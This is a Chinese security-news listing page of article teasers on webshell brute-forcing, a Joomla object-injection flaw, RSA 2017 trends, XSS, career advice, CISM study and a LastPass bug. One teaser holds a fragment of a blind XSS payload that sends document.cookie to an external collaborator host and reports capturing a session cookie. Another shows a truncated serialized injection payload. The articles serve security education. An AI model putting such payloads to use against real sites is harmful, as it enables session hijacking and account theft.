28 04月 行业热点 Webshell密码极速爆破工具 – cheetah update.py 更新模块 │ url.list 默认指定批量 webshell url文件 │ user-agent.list 用户代理文件
20 03月 行业热点 joomla对象注入漏洞 ;b:1;}ð Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-cn
23 02月 行业热点 RSA 2017安全大会 引人关注的10大安全趋势 这是安全初创公司和传统供应商一年中最为重要的会议。去年,RSA大会有超过30000名参会者,今年预计将有更多,会议吸引了从安全初创公司到数十亿美元的供应商。
23 02月 行业热点 浅谈网络安全常见漏洞与社会工程学 xss带来的危害可大可小,BAT三大公司,以及各大知名公司隔三差五被爆出此漏洞,有时被用于盗窃用户信息,甚至管理员信息,有时用来劫持页面钓鱼,有时用来做宣传,或引发蠕虫病毒攻击。
21 02月 行业热点 信息安全专业的学生应该如何进入该行业? 第一家实习的公司的老板,通过我blog的联系信息,知道我在我们校网络编辑部工作,于是就直接打电话找到了我们编辑部,刚好那天我也在,于是就接到了电话。
17 04月 行业热点 如何通过BurpSuite检测Blind XSS漏洞 b3fi8t28zwu2wbhmd5qgmx34vv1sph.burpcollaborator.net/leak-"+document.cookie,a')} 这一次,我便接收到了“connect.sid” cookie: 接下来,我在代理工具
16 06月 学习感言 疫情之下看我如何调整心态拿下CISM认证 同时,我也碰到了公司(某世界500强企业)前所未有的国际改革。就这样,一边开始读书学习,另一半则是公司的结构调整、职责变动。 此时我惊奇地发现,公司的改革就是CISM理论的落地。
24 03月 行业热点 LastPass密码管理器再曝严重漏洞,基于浏览器的密码管理器还能用吗? Ormandy解释说: “由于该漏洞的存在,要代理LastPass 4.1.42不受信任的信息是可行的。这个漏洞可让网站访问内部高权限RPC(远程过程调用)。